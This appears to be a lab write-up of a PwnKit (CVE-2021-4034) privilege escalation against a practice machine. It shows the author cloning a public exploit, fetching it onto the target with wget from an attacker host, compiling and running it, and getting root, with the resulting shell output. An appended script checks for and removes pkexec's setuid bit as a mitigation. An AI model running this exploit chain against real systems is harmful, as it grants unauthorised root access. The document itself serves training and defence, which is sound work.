CVE-2021-4034
PEAS has identified that the target system is vulnerable to CVE-2021-4034
A vulnerability, which was classified as critical, has been found in polkit (version unknown). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to an access control vulnerability. Classified under CWE, the problem is CWE-284: the product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.
Exploit
Exploit located online
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 1.33 MiB/s, done.
Resolving deltas: 100% (44/44), done.
Downloading the exploit to Kali
Exploitation
$ wget -q http://192.168.45.218:6006/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz; cd CVE-2021-4034
Delivery complete
$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
Compile
$ ./cve-2021-4034
# whoami
root
# hostname
ubuntu
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:83:3a:8b:3f brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:83ff:fe3a:8b3f/64 scope link
valid_lft forever preferred_lft forever
5: vethc812e22@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether b2:18:64:f5:36:86 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::b018:64ff:fef5:3686/64 scope link
valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:3d:17 brd ff:ff:ff:ff:ff:ff
inet 192.168.104.131/24 brd 192.168.104.255 scope global ens192
valid_lft forever preferred_lft forever
System level compromise
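Added defensive check, not part of the original write-up: the precondition the exploit above relies on is a setuid-root /usr/bin/pkexec, and the published interim workaround until polkit is patched is to drop that bit. The function names and the temp-file usage in the comments are my own; the check uses POSIX `test -u`.

```shell
#!/bin/sh
# Added example (not from the write-up): report whether a pkexec binary still
# carries the setuid bit, and apply the interim CVE-2021-4034 mitigation.
# Usage: pkexec_setuid_status /usr/bin/pkexec ; pkexec_mitigate /usr/bin/pkexec

# pkexec_setuid_status PATH
#   prints "setuid" (rc 0), "not-setuid" (rc 1) or "missing" (rc 2).
#   Note: version strings alone are unreliable because distributions backport
#   the fix, so this checks the bit that actually enables escalation.
pkexec_setuid_status() {
    path="$1"
    if [ ! -e "$path" ]; then
        echo "missing"
        return 2
    fi
    # POSIX test -u: true when the set-user-ID bit is set. pkexec ships
    # setuid root; without that bit the bug cannot yield uid 0.
    if [ -u "$path" ]; then
        echo "setuid"
        return 0
    fi
    echo "not-setuid"
    return 1
}

# pkexec_mitigate PATH
#   Removes the setuid bit (chmod 0755), the documented workaround until the
#   patched polkit package is installed. Needs root on a real system, and it
#   also disables pkexec's legitimate privilege-granting role until then.
pkexec_mitigate() {
    chmod 0755 "$1" || return 1
    # Re-verify: succeed only if the bit is really gone.
    if pkexec_setuid_status "$1" >/dev/null; then
        return 1
    fi
    return 0
}
```

Run the status check across a fleet before and after patching; "setuid" on an unpatched host means the write-up's chain is still possible there.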